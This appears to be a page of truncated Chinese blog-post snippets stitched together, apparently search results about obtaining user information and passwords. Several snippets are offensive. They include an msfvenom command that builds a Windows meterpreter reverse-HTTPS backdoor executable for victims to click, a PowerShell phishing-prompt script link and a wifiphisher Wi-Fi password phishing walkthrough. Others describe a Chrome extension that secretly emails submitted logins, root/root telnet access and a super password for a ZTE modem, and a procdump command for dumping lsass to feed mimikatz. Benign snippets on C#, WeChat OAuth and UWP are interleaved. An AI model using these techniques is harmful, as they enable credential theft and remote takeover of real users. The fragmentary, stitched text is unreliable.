1.powershell网络钓鱼脚本: https://raw.githubusercontent.com/enigma0x3/Invoke-LoginPrompt/master/Invoke-LoginPrompt.ps1 2.MSF下生产一个后门文件,通过上传或者其他方式让其受害者点击 Msfvenom -p windows/meterpreter/reverse_https lhost = 192.168.1.138  lport = 4444 -f exe> /opt/bk.exe 2.…

本来是想试验一下暴力破解的,但是由于字典太大,跑的时间也比较长,于是使用了钓鱼的方法. 先说一下wifiphisher钓鱼获取wifi密码的原理: wifiphisher对于你在攻击中选定的wifi会强制使连接目标wifi的客户机断开连接,然后使用你的无线网卡伪装成一个可连接的热点,并显示钓鱼页面,欺骗用户输入密码,然后wifiphisher接收到其输入的密码. 环境:1.kali Linux 2.wifiphisher 3.具有监听功能的适用于Linux的无线网卡 1.打开系统,将网卡接入虚拟…

Chrome 浏览器允许安装第三方扩展程序以扩展浏览器并给浏览器加入新的功能,扩展使用 JavaScript 以及 HTMl 编写并允许互相访问和控制 DOM. 因为允许访问 DOM,攻击者就可以读取表单字段中的内容,包括用户名以及密码字段,这就是让我冒出做这个原型想法的原因. 我这里放出的这个扩展很简单,每当用户提交一个表单时,扩展就尝试去获取用户名与密码字段,通过 Ajax 调用发送一封带有详细登陆信息以及登陆地址的邮件给我,然后正常的处理和提交表单,以免被用户发现.     有些人可能会怀…

 版权声明:本文为博主原创文章,遵循 CC 4.0 by-sa 版权协议,转载请附上原文出处链接和本声明.  之前博客的云主机到期了没续费,被删啦最重要的是没有备份!此处省略几个字.....        从这篇文章开始我的博客便开启了新的分类:NetDevops,希望在这里记录并分享我与网络及网络安全自动化运维平台的故事.原则是:有时间多撸代码,定期通过博客总结 本文主要记录通过Python实现获取用户基本信息(IP地址.客户端angent等信息),搞这个功能我是这样想的:运维平台的使用者主要…

原文:C# 带用户密码访问网络共享 调用WNetUseConnection API 函数详细参数参考:https://msdn.microsoft.com/en-us/library/windows/desktop/aa385482(v=vs.85).aspx C# 调用WNetUseConnection连接共享类的代码: NetworkShareConnect.cs //引入命名空间 //using System.Runtime.InteropServices; public class Ne…

微信OAuth授权获取用户OpenId-JAVA(个人经验)[申明:来源于网络] 地址:https://my.oschina.net/xshuai/blog/293458…

1. getevent命令 我们首先是根据adb shell getevent命令获取到被点击位置的信息. 这里要说明的是,不同的手机手机获得的点击输出是不一样的.以我的真机为例,输出如下 本文原创,转载请注明出处:http://blog.csdn.net/seu_calvin/article/details/51916845 /dev/input/event0 3 39 3e1 /dev/input/event0 1 14a 1 /dev/input/event0 1 145 1 /dev/i…

原文:UWP开发:获取用户当前所在的网络环境(WiFi.移动网络.LAN-) UWP开发:获取用户当前所在的网络环境: 在uwp开发中,有时候,我们需要判断用户所在的网络,是WiFi,还是移动网络,给用户提醒,以免造成用户流量的损失,uwp中提供了用户所在网络的一些信息,但具体的类型,需要我们进一步判断处理.如下这个静态类我已经写好了,用的时候只需调用它的 GetConnectionGeneration()方法即可返回当前网络类型.可以检测到的类型有2G.3G.4G.WiFi.LAN等.最后,为…

上次雷雨后更换的中兴的F660光猫还是很不错的,很稳定,不过超级密码确实记不住,找了些资料,今天成功的更改了密码,简要的写出过程以备下次参考: 第一步:获取超级密码(已知用户名telecomadmin密码nE7jA%5m的可无视) 1.telnet 192.168.1.1   2.用户名:root,密码:root,(linux的密码不显示,只要输对就行了)回车   3. 出现#就表示登陆成功了,然后输入命令cd /tmp 回车 输入cp db_backup_cfg.xml /home/httpd…

使用procdump64+mimikatz可实现从内存中获取明文密码 工具 链接:https://pan.baidu.com/s/1gNc9qLcNSNBohIVrAiqShw 密码:fc38 首先得先获取到内存文件lsass.exe进程, 它用于本地安全和登陆策略,一般在进程管理器中能看到, 比如这样 1.导出lsass.exe procdump64.exe -accepteula -ma lsass.exe lsass.dmp (注:必须使用管理员权限) ProcDump v8.0 - Wr…